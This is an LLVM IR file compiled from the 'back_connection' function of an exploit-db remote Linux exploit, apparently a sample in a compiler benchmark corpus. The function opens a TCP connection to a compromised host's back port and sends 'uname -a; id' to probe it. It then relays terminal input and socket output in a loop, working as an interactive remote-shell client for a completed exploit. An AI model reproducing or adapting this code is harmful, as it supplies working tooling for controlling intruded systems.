; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_23366.c_back_connection.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_23366.c_back_connection.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.sockaddr_in = type { %struct.TYPE_2__, i32, i32 }
%struct.TYPE_2__ = type { i64 }
%struct.sockaddr = type { i32 }

@.str = private unnamed_addr constant [30 x i8] c"/bin/uname -a ; /usr/bin/id;\0A\00", align 1
@AF_INET = common dso_local global i32 0, align 4
@SOCK_STREAM = common dso_local global i32 0, align 4
@stderr = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [8 x i8] c"[-] %s\0A\00", align 1
@errno = common dso_local global i32 0, align 4
@D_BACK = common dso_local global i32 0, align 4
@stdout = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [21 x i8] c"\0A[+] Let's rock on!\0A\00", align 1
@.str.3 = private unnamed_addr constant [49 x i8] c"[-] Connection closed by remote host,exiting...\0A\00", align 1
@.str.4 = private unnamed_addr constant [3 x i8] c"%s\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @back_connection(i64 %0) #0 {
  %2 = alloca i64, align 8
  %3 = alloca %struct.sockaddr_in, align 8
  %4 = alloca [4096 x i8], align 16
  %5 = alloca i32, align 4
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  %8 = alloca i8*, align 8
  store i64 %0, i64* %2, align 8
  store i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str, i64 0, i64 0), i8** %8, align 8
  %9 = load i32, i32* @AF_INET, align 4
  %10 = load i32, i32* @SOCK_STREAM, align 4
  %11 = call i32 @socket(i32 %9, i32 %10, i32 0)
  store i32 %11, i32* %6, align 4
  %12 = load i32, i32* %6, align 4
  %13 = icmp slt i32 %12, 0
  br i1 %13, label %14, label %20

14:                                               ; preds = %1
  %15 = load i32, i32* @stderr, align 4
  %16 = load i32, i32* @errno, align 4
  %17 = call i8* @strerror(i32 %16)
  %18 = call i32 (i32, i8*, ...) @fprintf(i32 %15, i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0), i8* %17)
  %19 = call i32 @exit(i32 0) #3
  unreachable

20:                                               ; preds = %1
  %21 = load i32, i32* @AF_INET, align 4
  %22 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %3, i32 0, i32 2
  store i32 %21, i32* %22, align 4
  %23 = load i32, i32* @D_BACK, align 4
  %24 = call i32 @htons(i32 %23)
  %25 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %3, i32 0, i32 1
  store i32 %24, i32* %25, align 8
  %26 = load i64, i64* %2, align 8
  %27 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %3, i32 0, i32 0
  %28 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %27, i32 0, i32 0
  store i64 %26, i64* %28, align 8
  %29 = load i32, i32* %6, align 4
  %30 = bitcast %struct.sockaddr_in* %3 to %struct.sockaddr*
  %31 = call i32 @connect(i32 %29, %struct.sockaddr* %30, i32 4)
  %32 = icmp eq i32 %31, -1
  br i1 %32, label %33, label %41

33:                                               ; preds = %20
  %34 = load i32, i32* @stderr, align 4
  %35 = load i32, i32* @errno, align 4
  %36 = call i8* @strerror(i32 %35)
  %37 = call i32 (i32, i8*, ...) @fprintf(i32 %34, i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0), i8* %36)
  %38 = load i32, i32* %6, align 4
  %39 = call i32 @close(i32 %38)
  %40 = call i32 @exit(i32 0) #3
  unreachable

41:                                               ; preds = %20
  %42 = load i32, i32* @stdout, align 4
  %43 = call i32 (i32, i8*, ...) @fprintf(i32 %42, i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.2, i64 0, i64 0))
  %44 = load i32, i32* %6, align 4
  %45 = load i8*, i8** %8, align 8
  %46 = load i8*, i8** %8, align 8
  %47 = call i32 @strlen(i8* %46)
  %48 = call i32 @send(i32 %44, i8* %45, i32 %47, i32 0)
  store i32 %48, i32* %7, align 4
  %49 = load i32, i32* %7, align 4
  %50 = icmp slt i32 %49, 0
  br i1 %50, label %51, label %59

51:                                               ; preds = %41
  %52 = load i32, i32* @stderr, align 4
  %53 = load i32, i32* @errno, align 4
  %54 = call i8* @strerror(i32 %53)
  %55 = call i32 (i32, i8*, ...) @fprintf(i32 %52, i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0), i8* %54)
  %56 = load i32, i32* %6, align 4
  %57 = call i32 @close(i32 %56)
  %58 = call i32 @exit(i32 0) #3
  unreachable

59:                                               ; preds = %41
  br label %60

60:                                               ; preds = %107, %59
  %61 = call i32 @FD_ZERO(i32* %5)
  %62 = call i32 @FD_SET(i32 0, i32* %5)
  %63 = load i32, i32* %6, align 4
  %64 = call i32 @FD_SET(i32 %63, i32* %5)
  %65 = call i32 @select(i32 255, i32* %5, i32* null, i32* null, i32* null)
  %66 = icmp eq i32 %65, -1
  br i1 %66, label %67, label %75

67:                                               ; preds = %60
  %68 = load i32, i32* @stderr, align 4
  %69 = load i32, i32* @errno, align 4
  %70 = call i8* @strerror(i32 %69)
  %71 = call i32 (i32, i8*, ...) @fprintf(i32 %68, i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0), i8* %70)
  %72 = load i32, i32* %6, align 4
  %73 = call i32 @close(i32 %72)
  %74 = call i32 @exit(i32 0) #3
  unreachable

75:                                               ; preds = %60
  %76 = getelementptr inbounds [4096 x i8], [4096 x i8]* %4, i64 0, i64 0
  %77 = call i32 @memset(i8* %76, i32 0, i32 4096)
  %78 = load i32, i32* %6, align 4
  %79 = call i64 @FD_ISSET(i32 %78, i32* %5)
  %80 = icmp ne i64 %79, 0
  br i1 %80, label %81, label %96

81:                                               ; preds = %75
  %82 = load i32, i32* %6, align 4
  %83 = getelementptr inbounds [4096 x i8], [4096 x i8]* %4, i64 0, i64 0
  %84 = call i32 @recv(i32 %82, i8* %83, i32 4096, i32 0)
  %85 = icmp eq i32 %84, -1
  br i1 %85, label %86, label %92

86:                                               ; preds = %81
  %87 = load i32, i32* @stderr, align 4
  %88 = call i32 (i32, i8*, ...) @fprintf(i32 %87, i8* getelementptr inbounds ([49 x i8], [49 x i8]* @.str.3, i64 0, i64 0))
  %89 = load i32, i32* %6, align 4
  %90 = call i32 @close(i32 %89)
  %91 = call i32 @exit(i32 0) #3
  unreachable

92:                                               ; preds = %81
  %93 = load i32, i32* @stderr, align 4
  %94 = getelementptr inbounds [4096 x i8], [4096 x i8]* %4, i64 0, i64 0
  %95 = call i32 (i32, i8*, ...) @fprintf(i32 %93, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.4, i64 0, i64 0), i8* %94)
  br label %96

96:                                               ; preds = %92, %75
  %97 = call i64 @FD_ISSET(i32 0, i32* %5)
  %98 = icmp ne i64 %97, 0
  br i1 %98, label %99, label %107

99:                                               ; preds = %96
  %100 = getelementptr inbounds [4096 x i8], [4096 x i8]* %4, i64 0, i64 0
  %101 = call i32 @read(i32 0, i8* %100, i32 4096)
  %102 = load i32, i32* %6, align 4
  %103 = getelementptr inbounds [4096 x i8], [4096 x i8]* %4, i64 0, i64 0
  %104 = getelementptr inbounds [4096 x i8], [4096 x i8]* %4, i64 0, i64 0
  %105 = call i32 @strlen(i8* %104)
  %106 = call i32 @write(i32 %102, i8* %103, i32 %105)
  br label %107

107:                                              ; preds = %99, %96
  br label %60
}

declare dso_local i32 @socket(i32, i32, i32) #1

declare dso_local i32 @fprintf(i32, i8*, ...) #1

declare dso_local i8* @strerror(i32) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @htons(i32) #1

declare dso_local i32 @connect(i32, %struct.sockaddr*, i32) #1

declare dso_local i32 @close(i32) #1

declare dso_local i32 @send(i32, i8*, i32, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @FD_ZERO(i32*) #1

declare dso_local i32 @FD_SET(i32, i32*) #1

declare dso_local i32 @select(i32, i32*, i32*, i32*, i32*) #1

declare dso_local i32 @memset(i8*, i32, i32) #1

declare dso_local i64 @FD_ISSET(i32, i32*) #1

declare dso_local i32 @recv(i32, i8*, i32, i32) #1

declare dso_local i32 @read(i32, i8*, i32) #1

declare dso_local i32 @write(i32, i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
